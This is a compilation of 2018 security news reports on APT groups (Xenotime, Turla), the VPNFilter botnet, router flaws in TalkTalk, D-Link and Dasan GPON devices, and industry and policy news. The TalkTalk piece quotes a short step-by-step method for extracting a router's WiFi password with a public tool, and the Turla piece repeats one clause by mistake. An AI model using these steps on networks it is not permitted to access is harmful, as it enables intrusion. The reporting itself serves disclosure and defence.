TRITON is designed to communicate using the proprietary TriStation protocol which is not publicly documented, this implies that the attackers reverse engineered the protocol to carry out the attack.

According to experts at Dragos, threat actors have been around since at least 2014, they were discovered in 2017 after they caused a shutdown at a critical infrastructure organization somewhere in Saudi Arabia.

Dragos researchers warn of new cyber attacks powered by the same group against organizations globally.

“Dragos assesses with moderate confidence that Xenotime intends to establish required access and capability to cause a potential future disruptive or even destructive event,” states Dragos Security. “Compromising safety systems provides little value outside of disrupting operations. The group created a custom malware framework and tailormade credential gathering tools, but an apparent misconfiguration prevented the attack from executing properly. As Xenotime matures, it is less likely that the group will make this mistake in the future.”

Experts at Dragos have published a collection of reports related to threat groups targeting critical infrastructure, the first one was on the activities of the Russia-linked Allanite group.

Summary info on threat actors will be made available through an Activity Groups dashboard, but users interested in the full technical report need to pay it.


Experts warn: it is too easy to steal WiFi access key from TalkTalk ‘s Super Routers
24.5.2018 securityaffairs Hacking

Home Wi-Fi networks in the UK using Super Router provided by TalkTalk ISP are affected by a vulnerability that exposes them to cyber attacks.
Security researchers at software house IndigoFuzz have discovered a security flaw in the implementation of the WPS feature of the TalkTalk Super Router that can be exploited to compromise to steal the gateway’s wireless network password and take over them.

Experts reported the issue to TalkTalk ISP back in 2014, but currently the vulnerability is still present.

The routers implement a WPS pairing option that is turned on by default, but due to the security issues affecting WPS protocol an attacker within range can easily extract the Wi-Fi password of the device by using hacking tools available online.

“The vulnerability discovered allows the attacker to discover the Super Router’s WiFi Password by attacking the WPS feature in the router which is always switched on, even if the WPS pairing button is not used.” reads the blog post published by Indigofuzz.

According to IndigoFuzz’s advisory on Monday, the routers provide a WPS pairing option that is always turned on. Because that WPS connection is insecure, an attacker within range can exploit it using readily available hacking tools (i.e. Software ‘Dumpper’ available on Sourceforge (Tested with v.91.2)), and thus extract the router’s Wi-Fi password.

Attackers just need to be in the range of a TalkTalk Super Router, then probe it for the Wi-Fi password exploiting the insecure WPS feature and gain the gateway’s password.

Below the procedure described by the experts to compromise a network using the TalkTalk Super Router and obtain the WiFi access key.

Step 1: Run Dumpper and navigate to the WPS tab and select the target WiFi BSSID.
Step 2: Click ‘WpsWin’ to begin probing the BSSID for the WPS pin.
Step 3: After a couple of seconds, the WiFi access key to this network will be displayed bottom right.
talktalk Super Router 3

The experts explained that this attack is scalable to a broad range of TalkTalk Super Routers.

“This method has proven successful on multiple TalkTalk Super Routers belonging to consenting parties which is enough to suggest that this vulnerability affects all TalkTalk Super Routers of this particular model/version,” concluded the IndigoFuzz experts.

“TalkTalk have been notified of this vulnerability in the past and have failed to patch it many years later.”

Below the Timeline shared by the experts:

21 May 2018 Delivered to TalkTalk.
21 May 2018 Date of public release.
IndigoFuzz decided to immediately publicly disclose the issue because TalkTalk hasn’t taken any action since its first reports in 2014.

“The purpose of this article is to encourage TalkTalk to immediately patch this vulnerability in order to protect their customers,” concluded the experts.


Turla APT group leverages for the first time the Metasploit framework for the Mosquito campaign
24.5.2018 securityaffairs APT

Security experts from ESET observed the Turla APT group leveraging for the first time the Metasploit framework in the Mosquito campaign
The Russia-linked Turla APT group continues its cyber espionage campaigns shifting towards more generic tools to remain under the radar.
Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

In the most recent attacks, the group is packaging its macOS backdoor with a real Adobe Flash installer and downloading the malware on victim systems from endpoint systems that use a remote IP belonging to Akamai, the Content Delivery Network that is also used by Adobe for its supply chain. Legitimate Flash installer, in fact, are also distributed through the Akamai network.

In January experts observed the APT group employing Adobe Flash Installer and an ingenious social engineering technique, to deliver a backdoor served from what appears to be legitimate Adobe URLs and IP addresses.

Starting in March 2018, the experts from ESET observed a significant change in the campaign: the hackers are leveraging the popular open source exploitation framework Metasploit in a campaign that spread the Mosquito backdoor.
This is the first time the Turla has used Metasploit as a first stage backdoor, instead of relying on one of its own tools such as Skipper.
Mosquito campaign still leverages fake Flash installer that hides the Turla backdoor.

When victims download the Flash installer from get.adobe.com through HTTP attackers intercept the traffic to serve a tainted version of the legitimate Flash executable.

Turla APT

“At the beginning of March 2018, as part of our regular tracking of Turla’s activities, we observed some changes in the Mosquito campaign.”

“Recently, we observed a change in the way in which the final backdoor is dropped. Turla’s campaign still relies on a fake Flash installer but, instead of directly dropping the two malicious DLLs, it executes a Metasploit shellcode and drops, or downloads from Google Drive, a legitimate Flash installer.” reads the report published by ESET. “Then, the shellcode downloads a Meterpreter, which is a typical Metasploit payload [6], allowing the attacker to control the compromised machine. Finally, the machine may receive the typical Mosquito backdoor.”

Turla APT 2.png

Attackers control the exploitation process manually through the use of the Metasploit framework, the overall time frame of the attack was relatively short. According to ESET, the attackers are able to deliver the final backdoor in just thirty minutes.

“The shellcode is a typical Metasploit shellcode, protected using the shikata_ga_nai encoder [7] with seven iterations. Once the shellcode is decoded, it contacts its C&C at https://209.239.115[.]91/6OHEJ, which directs the download of an additional shellcode.” continues the report.

“Based on our telemetry, we identified the next stage to be a Meterpreter. That IP address is already known as a previously seen Mosquito C&C domain, psychology-blog.ezua[.]com, was resolving to it in October 2017. Finally, the fake Flash installer downloads a legitimate Adobe installer, from a Google Drive URL, and executes it to lull the user into thinking all went correctly.”

Experts noticed that in addition to the new fake Flash installer and Meterpreter, the hackers used many other tools, including:

A custom executable that only contains the Metasploit shellcode. This is used to maintain access to a Meterpreter session. It is saved to C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msupdateconf.exe, granting the executable persistence.
Another custom executable used to execute PowerShell scripts.
The Mosquito JScript backdoor that uses Google Apps Script as its C&C server.
Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8].
Further details, including IoC are included in the report.


Huge Russia-Linked botnet VPNFilter ready to launch a massive attack on Ukraine
24.5.2018 securityaffairs BotNet

Security firm Talos along with other cybersecurity firms and law enforcement agencies have uncovered a huge botnet dubbed VPNFilter, composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.
The experts believe the VPNFilter was developed by Russia and the associated malware appears to be very sophisticated, at the time they discovered more than 500,000 compromised devices across 54 countries.

“For several months, Talos has been working with public- and private-sector threat intelligence partners and law enforcement in researching an advanced, likely state-sponsored or state-affiliated actor’s widespread use of a sophisticated modular malware system we call ‘VPNFilter.'” reads the blog post published by Talos.

“We have not completed our research, but recent events have convinced us that the correct way forward is to now share our findings so that affected parties can take the appropriate action to defend themselves.”

Even if the experts are still investigating the botnet, they decided to publish an initial report fearing an imminent massive attack powered by VPNFilter.

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

At the time of writing, the experts haven’t yet identified the attack vector.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose.

“As of this writing, we are aware of two plugin modules: a packet sniffer for collecting traffic that passes through the device, including theft of website credentials and monitoring of Modbus SCADA protocols, and a communications module that allows stage 2 to communicate over Tor.” continues the report.

“We assess with high confidence that several other plugin modules exist, but we have yet to discover them.”

VPNFilter malware

Experts are particularly concerned by the destructive features implemented by the malware that could allow attackers to burn users’ devices to cover up their tracks.

Experts believe that the attack could be launched by threat actors during the Ukrainian celebration of the Constitution Day, last year the NotPetya wiper attack was launched on the same period.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor’s operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos concluded.


Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
24.5.2018 securityaffairs
Vulnerebility

Security experts from Kaspersky have discovered a backdoor account and other three vulnerabilities in D-Link DIR-620 Routers.
Security researchers from Kaspersky Lab have uncovered a backdoor account (CVE-2018-6213) in the firmware of D-Link DIR-620 routers that could be exploited by attackers to access to the device’s web panel and take over devices exposed online.

“The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords.” reads the blog post published by Kaspersky.

“The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).”

To prevent abuse, the experts did not disclose the credentials for the backdoor account.

D-Link DIR-620 rev-F1

The bad news is that it is impossible to disable the backdoor account, the only way to mitigate the issue is to avoid exposing the admin panel online.

The firmware version containing the backdoor account is 1.0.37.

Kaspersky researchers have discovered other three vulnerabilities in the firmware of the D-Link DIR-620 routers. The remaining issues are:

CVE-2018-6210 – Hardcoded default credentials for Telnet.
CVE-2018-6211 – OS command injection
CVE-2018-6212 – Weakness in user data validation (reflected cross-site scripting)
Fortunately, there aren’t many D-Link DIR-620 devices exposed online because it is an old model.

The flawed devices were distributed by ISPs in Russia, CIS, and Eastern Europe ISPs (most of them in Russia), Kaspersky already reported the flaws to the ISPs.

D-Link DIR-620 shodan

D-Link was notified the vulnerabilities by said it will not issue firmware updates to address them.

To mitigate the issues Kaspersky recommends:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password


Justice Department announces actions to disrupt the VPNFilter botnet
24.5.2018 securityaffairs APT 
Virus

The Justice Department announced an effort to disrupt the VPNFilter botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a Russia-linked APT group.
Yesterday Talos and other security firm revealed the discovery of a huge botnet tracked as VPNFilter composed of more than 500,000 compromised routers and network-attached storage (NAS) devices, now more details emerged on the case.

The experts believe the VPNFilter was developed by Russia, the associated malware compromised devices across 54 countries, most of them in Ukraine.

On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

The US Justice Department announced it had seized a domain used as part of the command and control infrastructure, it explicitly refers the Russian APT groups (APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group) as the operators behind the huge botnet,

“The Justice Department today announced an effort to disrupt a global botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a group of actors known as the “Sofacy Group” (also known as “apt28,” “sandworm,” “x-agent,” “pawn storm,” “fancy bear” and “sednit”).” reads the press release published by the DoJ.

“Today’s announcement highlights the FBI’s ability to take swift action in the fight against cybercrime and our commitment to protecting the American people and their devices,” said Assistant Director Scott Smith. “By seizing a domain used by malicious cyber actors in their botnet campaign, the FBI has taken a critical step in minimizing the impact of the malware attack. While this is an important first step, the FBI’s work is not done. The FBI, along with our domestic and international partners, will continue our efforts to identify and expose those responsible for this wave of malware.”

The VPNFilter botnet targets SOHO routers and network-access storage (NAS) devices and uses several stages of malware. The experts highlighted that the second stage of malware that implements malicious capabilities can be cleared from a device by rebooting it, while the first stage of malware implements a persistence mechanism.

The Justice Department had obtained a warrant authorizing the FBI to seize the domain that is part of the command and control infrastructure of the VPNFilter botnet.

Technically the operation conducted by the US authorities is called “sink holing,” the seizure of the domain will allow law enforcement and security experts to analyze the traffic associated with the botnet to gather further info on the threat and temporarily neutralize it.

“In order to identify infected devices and facilitate their remediation, the U.S. Attorney’s Office for the Western District of Pennsylvania applied for and obtained court orders, authorizing the FBI to seize a domain that is part of the malware’s command-and-control infrastructure.” continues the DoJ.

“This will redirect attempts by stage one of the malware to reinfect the device to an FBI-controlled server, which will capture the Internet Protocol (IP) address of infected devices, pursuant to legal process. A non-profit partner organization, The Shadowserver Foundation, will disseminate the IP addresses to those who can assist with remediating the VPNFilter botnet, including foreign CERTs and internet service providers (ISPs).”

The owners of the compromised SOHO and NAS devices should reboot their devices as soon as possible, the operation will temporarily remove the second stage malware and will cause the first stage malware to connect the C&C domain for instructions.

“Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure.” continues the DoJ.

VPNFilter malware

Experts are particularly concerned by the destructive features implemented by the malware that could allow attackers to burn users’ devices to cover up their tracks.

Experts believe that the attack could be launched by threat actors during the Ukrainian celebration of the Constitution Day, last year the NotPetya wiper attack was launched on the same period.

Both Justice and Cisco said they were releasing details of the problem before having found a strong, permanent fix. Justice said that by seizing control of one of the domains involved in running VNPFilter, it will give owners of infected routers a chance to reboot them, forcing them to begin communicating with the now-neutralized command domain.

The vulnerability will remain, Justice said, but the move will allow them more time to identify and intervene in other parts of the network.


FBI Inflated Numbers on Unhackable Devices
23.5.2018 securityweek BigBrothers

The FBI claimed it was unable to analyze roughly 7,700 devices last year due to strong encryption, but the actual number is likely much lower and the agency has admitted its mistake.

Over the past years, the FBI and some U.S. lawmakers have been pushing technology companies to find ways to provide law enforcement access to encrypted communications and information. However, tech firms and experts have warned that implementing backdoors could pose a serious risk and it would undermine the purpose of encryption.

In 2016, the FBI attempted to convince a judge to force Apple to hack into the iPhone of the man behind the 2015 terrorist attack in San Bernardino. The agency ultimately dropped the case after finding an alternative way to access the data on the phone, but it later came to light that the FBI was probably only trying to create legal precedent.

There are several companies, including Israel-based Cellebrite and US-based Grayshift, that claim to have the tools and skills needed to access nearly any locked device, including the latest iPhone X.

The FBI came under fire earlier this year after a report from the Department of Justice’s Office of the Inspector General (OIG) revealed that senior leaders within the agency were not happy that an alternative solution had been found for getting into the San Bernardino shooter’s phone.

The FBI has even set up a page on its official website dedicated to “Going Dark,” the term used to describe the inability to intercept and access communications and information due to technological factors.

Over the past months, FBI Director Christopher Wray repeatedly claimed that the agency had been unable to access data from nearly 7,800 devices in the previous fiscal year due to encryption. However, it has now come to light that the actual number of devices is only between 1,000 and 2,000, The Washington Post reported.

The FBI has admitted the error and blamed it on a flawed methodology introduced in April 2016, but insists that Going Dark is still a serious problem.

The Electronic Frontier Foundation (EFF) recently submitted a Freedom of Information Act (FOIA) request to learn more about this methodology and the FBI’s use of third-party solutions for bypassing encryption.

“Imposing an exceptional access mandate on encryption providers would be extraordinarily dangerous from a security perspective, but the government has never provided details about the scope of the supposed Going Dark problem,” said EFF’s Andrew Crocker. “The latest revision to Director Wray’s favorite talking point demonstrates that the case for legislation is even weaker than we thought.”


VMware Patches Fusion, Workstation Vulnerabilities
23.5.2018 securityweek
Vulnerebility

VMware informed customers on Monday that updates for its Fusion and Workstation products patch important denial-of-service (DoS) and privilege escalation vulnerabilities.

According to VMware, Fusion 10.x on macOS is impacted by a signature bypass flaw that can be exploited for local privilege escalation. The security hole, tracked as CVE-2018-6962, was discovered by a researcher from Chinese company Ant Financial. The issue has been fixed with the release of VMware Fusion 10.1.2.

VMware also revealed that Workstation 14.x on any platform and Fusion 10.X on macOS are impacted by several DoS vulnerabilities. 
“VMware Workstation and Fusion contain multiple denial-of-service vulnerabilities that occur due to NULL pointer dereference issues in the RPC handler. Successful exploitation of these issues may allow an attacker with limited privileges on the guest machine trigger a denial-of-Service of their guest machine,” the company said in its advisory.

The flaw, identified as CVE-2018-6963, was reported to VMware by Hahna Latonick and Kevin Fujimoto through Trend Micro's Zero Day Initiative (ZDI), and independently by Bruno Botelho. The issue was addressed with the release of Workstation 14.1.2 and Fusion 10.1.2.

ZDI has yet to publish its advisories for the vulnerabilities found by Latonick and Fujimoto, but the company’s site shows that the issues were reported in mid-April.

VMware on Monday also published an advisory describing the impact of a recently uncovered speculative execution attack method on its products.

Researchers disclosed the details of two new issues, related to the Meltdown and Spectre attacks, that have been dubbed Variant 3a and Variant 4.

VMware says Variant 4, tracked as CVE-2018-3639, affects vSphere, Workstation and Fusion. Updates for these products enable Hypervisor-Assisted Guest mitigations for this vulnerability.

“vCenter Server, ESXi, Workstation, and Fusion update speculative execution control mechanism for Virtual Machines (VMs). As a result, a patched Guest Operating System (GOS) can remediate the Speculative Store bypass issue (CVE-2018-3639) using the Speculative-Store-Bypass-Disable (SSBD) control bit. This issue may allow for information disclosure in applications and/or execution runtimes which rely on managed code security mechanisms. Based on current evaluations, we do not believe that CVE-2018-3639 could allow for VM to VM or Hypervisor to VM Information disclosure,” VMware said.

Earlier this month, the company published an advisory informing customers that VMware NSX SD-WAN Edge by VeloCloud contains an unauthenticated command injection vulnerability. While the issue is potentially serious as it allows remote code execution, it has been assigned a severity rating of “important” as the impacted component is not enabled by default and it will be removed in future releases.


FireEye Launches OAuth Attack Testing Platform
23.5.2018 securityweek Safety

FireEye on Monday announced the availability of a platform to allow organizations and pentesters check their ability to detect and respond to OAuth abuse attacks.

OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user's data without the need for credentials.

“In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.

In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).

An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.

An attacker can obtain OAuth tokens via social engineering, by convincing the victim to click a “Consent link” and approve the application. This is exactly what happened last year, when a phishing attack targeting Gmail users spread like a worm and tricked many users into allowing a malicious app named “Google Docs” to access their contact information.

Called PwnAuth, the newly launched web application framework should make it easier for organizations to test their ability to detect and respond to OAuth abuse campaigns.

“The web application provides penetration testers with an easy-to-use UI to manage malicious OAuth applications, store gathered OAuth tokens, and interact with API Resources. The application UI and framework are designed to be easily extendable to other API Resources through the creation of additional modules,” Bienstock notes.

Available on GitHub, the platform comes with a module to support malicious Office 365 applications capable of capturing OAuth tokens and using them to interact with the Microsoft Graph API. However, PwnAuth could be used to target any cloud environment that allows OAuth applications.

The available Office 365 module supports reading the mail messages, searching the user's mailbox, reading the user's contacts, downloading messages and attachments, searching OneDrive and downloading files, and sending messages on behalf of the user.

Using PwnAuth requires creating a Microsoft application first, and then start phishing for potential victims. Once they click on the generated “Authorization URL,” PwnAuth captures OAuth tokens, and these can be used to access their data. More detailed information on the platform’s usage can be found on the GitHub wiki.

Mitigations include training programs on social engineering and taking steps to diminish the impact of malicious OAuth applications by limiting API scopes they can request, disabling third-party apps within the organization, implementing application whitelisting, logging any user consent events, and querying an organization's user base for all consented applications, the researcher says.

“OAuth abuse attacks are a dangerous and non-traditional phishing technique that attackers can use to gain access to an organization's confidential data. As we move more services to the cloud, organizations should be careful to lock down third-party application access and ensure that their monitoring and detection strategy covers application consent grants. Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack,” Bienstock concludes.


Botnets Target Zero-Days in GPON Routers
23.5.2018 securityweek BotNet

Two unpatched vulnerabilities in Dasan’s Gigabit-capable Passive Optical Network (GPON) routers are being exploited by Internet of Things (IoT) botnets, security researchers warn.

Tracked as CVE-2018-10561 and CVE-2018-10562, the two vulnerabilities were publicly disclosed in early May and impact hundreds of thousands of devices. The flaws can be exploited remotely, providing an attacker with full control of the impacted devices.

South Korea-based Dasan Networks hasn’t released a fix for these issues as of now, yet the first attempts to exploit the bugs were registered within days after the disclosure. An unofficial patch for the bugs was made available a couple of weeks back.

Last week, Fortinet alerted on Wicked, a new variant of Mirai that has added exploits for the GPON vulnerabilities to its arsenal. The security firm also revealed that a botnet iteration called Omni was being dropped onto the compromised devices.

According to researchers from Qihoo 360 Netlab, there were five botnets targeting the two GPON vulnerabilities last week, namely Hajime, Mettle, Mirai, Muhstik, and Satori.

Now, the security researchers reveal that an older botnet called TheMoon has joined the GPON party as well. Active since at least 2014, the botnet has merged at least 6 different IoT exploits last year, and appears to continue to evolve.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day. And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose not to disclose the attack payload details,” Netlab notes.

Trend Micro also reports Mirai-like scanning activity in Mexico, with GPON routers being the target. This is unsurprising, given that most of the Internet-exposed Dasan routers affected by the two flaws are located in Mexico, Kazakhstan, and Vietnam.

“Unlike the previous activity, the targets for this new scanning procedure are distributed. However, based on the username and password combinations we found in our data, we concluded that the target devices still consist of home routers or IP cameras that use default passwords,” Trend Micro notes.

However, the attacks also attempt to compromise the targeted devices using vulnerabilities, the security firm notes. A downloading script is used to fetch malware variants for four different architectures, namely ARM, ARMv7, MIPS and MIPS little-endian, common architectures in embedded and IoT devices.


Attackers Hide in Plain Sight as Threat Hunting Lags: Report
23.5.2018 securityweek Cyber

CISO Survey Shows the Importance of Threat Hunting in the Finance Sector

The finance sector has one of the most robust cybersecurity postures in industry. It is heavily regulated, frequently attacked, and well-resourced -- but not immune to cybercriminals. Ninety percent of financial institutions were targeted by ransomware alone in the past 12 months.

Endpoint protection firm Carbon Black surveyed the CISOs of 40 major financial institutions during April 2018 to understand how the finance sector is attacked and what concerns its defenders. Two things most stand out: nearly half (44%) of financial institutions are concerned about the security posture of their technology service providers (TSPs -- the supply chain); and despite their resources, only 37% have established threat hunting teams.

Concern over the supply chain is not surprising. Cybercriminals are increasingly attacking third-parties (who may be less well-protected or have their own security issues) to gain access to the primary target. The Federal Deposit Insurance Corporation (FDIC) is also concerned about the supply chain, and has developed an examination process that includes reviewing public information about the TSPs and their software.

One of the areas that concerns the FDIC is consolidation within the service provider industry. "For example," it notes, "a flawed acquisition strategy may weaken the financial condition of the acquirer, or a poorly planned integration could heighten operational or security risk."

Carbon Black recommends that this potential risk be countered by hunt teams and defenders closely assessing their TSP security posture. But, it adds, "Given that 63% of financial institutions have yet to establish threat hunting teams, there should be concern regarding limited visibility into exposure created by TSPs."

But it also considers threat hunting to be important in detecting direct attacks. There are two primary reasons. The first is the increasing tendency for attackers to use fileless attacks that are not easily detected by standard technology; and the second is a growing willingness for attackers to engage in counter-countermeasures; that is, to counter the defender's incident response.

Fileless attacks are increasing across all industry sectors. A typical attack might involve a Flash vulnerability. Flash invokes PowerShell, feeding instructions via the command line. PowerShell then connects to a stealth C&C server, from where it downloads a more extensive PowerShell script that performs the attack. All of this is done in memory -- no malware file is downloaded and there is nothing for traditional technology defenses to detect.

"Active threat hunting," says Carbon Black, "puts defenders 'on the offensive' rather than simply reacting to the deluge of daily alerts." It "aims to find abnormal activity on servers and endpoints that may be signs of compromise, intrusion or exfiltration of data. Though the concept of threat hunting isn't new, for many organizations the very idea of threat hunting is."

But the need for threat hunting goes beyond simple detection of intrusion. "Attackers are able to go off their scripts while defenders are sticking to manual and automated playbooks," warns Carbon Black. "These playbooks are generally based off simple indicators of compromise (IoCs). As a result, security teams are often left thinking they have disrupted the attacker but, with counter incident response, attackers maintain the upper hand."

Compounding this, attackers are beginning to incorporate a secondary command and control in case one is discovered or disrupted. Carbon Black notes that this tactic has already been found in 10% of victims, and predicts it is a tactic that will grow in future months. The principal is that an attacker's ability to improvise and change directions at speed is best countered by a human defender rather than simply a pre-programmed set of incident response steps.

"Financial institutions," suggests Carbon Black, "should aim to improve situational awareness and visibility into the more advanced attacker movements post breach. This must be accompanied with a tactical paradigm shift from prevention to detection. The increasing attack surface, coupled with the utilization of advanced tactics, has allowed attackers to become invisible. Decreasing dwell time is the true return on investment for any cybersecurity program."

In reality, of course, this does not just apply to the finance sector. The same evolving methodology is being used by attackers across all industry sectors. The need for threat hunting is not limited to finance. "All sectors should take heed," Carbon Black chief cybersecurity officer Tom Kellerman told SecurityWeek. "Generally speaking, financial services tend to be the most secure as they've come under attack with high-profile attack campaigns in recent years." The implication is that if the finance sector is slow to switch to active threat hunting, other sectors will be slower.

In April 2018, Carbon Black filed an S-1 registration statement with the U.S. Securities and Exchange Commission (SEC) for a proposed initial public offering (IPO) of its common stock. Shares of the company (NASDAQ: CBLK) jumped 26% on its first day of trading on May 4. The company has a market capitalization of nearly $1.6 billion at the time of publishing. The company emerged in its current form after its purchase by Bit9 in February 2014.


Activists Urge Amazon to Drop Facial Recognition for Police
23.5.2018 securityweek Privacy

More than 30 activist groups led by the American Civil Liberties Union urged Amazon Tuesday to stop providing facial recognition technology to law enforcement, warning that it could give authorities "dangerous surveillance powers."

The organizations sent a letter to Amazon after an ACLU investigation found Amazon had been working with a number of US law enforcement agencies to deploy its artificial intelligence-powered Rekognition service.

"Rekognition marketing materials read like a user manual for authoritarian surveillance," said Nicole Ozer of the ACLU of California.

"Once a dangerous surveillance system like this is turned against the public, the harm can't be undone."

A letter to Amazon chief Jeff Bezos was signed by groups including the Electronic Frontier Foundation, Black Lives Matter, Freedom of the Press Foundation and Human Rights Watch.

"Amazon Rekognition is primed for abuse in the hands of governments," the letter said.

"This product poses a grave threat to communities, including people of color and immigrants, and to the trust and respect Amazon has worked to build."

Amazon is one of many companies in the US and elsewhere which deploy facial recognition for security and law enforcement.

Some research has indicated that such programs can be error-prone, particularly when identifying people of color, and activists argue these systems can build up large databases of biometric information which can be subject to abuse.

In China, authorities have created a digital surveillance system able to use a variety of biometric data -- from photos and iris scans to fingerprints -- to keep close tabs on the movements of the entire population, and uses it to publicly identify lawbreakers and jaywalkers.

The ACLU released documents showing correspondence with police departments in Florida, Arizona and other states on Rekognition, which is a service of Amazon Web Services.

The US activist groups say a large deployment by Amazon, which is one of the leaders in artificial intelligence, could lead to broad surveillance of the US population.

"People should be free to walk down the street without being watched by the government," the letter said.

"Facial recognition in American communities threatens this freedom. In overpoliced communities of color, it could effectively eliminate it. The federal government could use this facial recognition technology to continuously track immigrants as they embark on new lives."

Amazon did not immediately respond to an AFP request for comment on the letter.


Cloudflare Improves DDoS Mitigation Tool
23.5.2018 securityweek Safety

Cloudflare announced a series of improvements to its Rate Limiting distributed denial of service (DDoS) protection tool this week.

Over the past six months, the company has observed an uptick in application (Layer 7) based DDoS attacks and also noticed that the assaults aren’t using huge payloads (volumetric attacks), but rely on a high number of requests per second to exhaust server resources (CPU, Disk and Memory). Attacks with over 1 million requests per second are a common thing, Cloudflare says.

Launched by the web infrastructure company a year ago, the Rate Limiting feature helps customers protect their web applications and APIs from various attacks, including DDoS, credential stuffing and content scraping.

In addition to the previously available Block and Simulate options, the tool now provides customers with Cloudflare JavaScript Challenge and Google reCaptcha (Challenge) mitigation actions available in the UI and API. Additionally, the company claims to have made Rate Limiting more dynamically scalable.

“A new feature has been added which allows Rate Limiting to count on Origin Response Headers for Business and Enterprise customers. The way this feature works is by matching attributes which are returned by the Origin to Cloudflare,” the web protection company notes.

For the credential stuffing protection, for example, Cloudflare customers can set a single rule (a Basic rate limit) or multiple rules (Advanced limits) to prevent abuse, depending on their needs. This ensures that only users (which typically enter a wrong password three times before hitting the recovery option) log in, and not bots (which go through thousands of credential combinations to see what works).

“With this type of tiering, any genuine users that are just having a hard time remembering their login details whilst also being extremely fast typers will not be fully blocked. Instead, they will first be given out automated JavaScript challenge followed by a traditional CAPTCHA if they hit the next limit. This is a much more user-friendly approach while still securing your login endpoints,” Cloudflare points out.

Cloudflare’s tool also includes a new origin headers feature that allows customers to configure their origin to respond with a header to trigger a rate-limit. A header is generated at the origin, and added to the response to Cloudflare.

“As we are matching on a static header, we can set a severity level based on the content of the Header. For example, if it was a repeat offender, you could respond with High as the Header value, which could Block for a longer period,” Cloudflare explains.

Rate Limiting can also protect from the increasingly popular enumeration attacks, the company says. Such assaults rely in identifying an expensive operation in an app and then overload it to exhaust resources and slow or crash the app.

To fend off such attacks, one can set a rate limit for the 404 (page not found) response a query sent to the app receives when the user is not found. Thus, if the threshold of 404’s is crossed in a given period of time, the app can be set to challenge the user to prove they are a real person.

To mitigate content scrapping, Rate Limiting includes support for rules to distinguish between users who browse heavily and bot attempts to copy content for redistribution or reuse. The tool counts the number of requests to each endpoint and the number of hits to the image store, as well as the number of served 404 and 403 pages.

Cloudflare also decided to increase the number of available rules for Pro and Business customers, for no additional charge. Thus, Pro plans now include 10 rules, while Business plans include 15 rules.


U.S. Lawmakers Denounce Purported ZTE Deal
23.5.2018 securityweek BigBrothers

The United States and China have a tentative deal to save embattled Chinese telecom company ZTE, days after the two nations announced a truce in their trade standoff, The Wall Street Journal reported Tuesday.

The report sparked an immediate negative reaction on Capitol Hill, where top Republican and Democrat senators denounced it.

Details remain to be hammered out, but according to the general outlines of the agreement, Washington would lift a crippling ban on selling US components to the company, which in turn would make major changes in its management, executive board and possibly pay additional fines, according to the report.

The company had faced collapse due to the US ban, which resulted from its violations of US sanctions against Iran and North Korea.

Washington and Beijing on Saturday called a halt to a spiraling trade dispute sparked by US accusations of unfair trade practices and the alleged theft of US technology, suspending plans to impose tariffs on as much as $150 billion in Chinese imports.

In a series of tweets, top Republican Senator Marco Rubio of Florida, who chairs a key subcommittee on foreign relations, denounced the move, vowing lawmakers would work on "veto-proof legislation" to stop the deal.

"If this is true, then the administration has surrendered to #China on #ZTE," Rubio wrote.

"Making changes to their board & a fine won't stop them from spying & stealing from us."

Minority Leader Chuck Schumer, Democrat of New York, said the proposed arrangement would "do nothing to protect American national or economic security and are simply a diversion from the fact that we have lost."

- Mnuchin on the Hill -

Schumer said in a statement the White House and Treasury Secretary Steven Mnuchin had been duped by China.

"President Xi has played President Trump and Secretary Mnuchin."

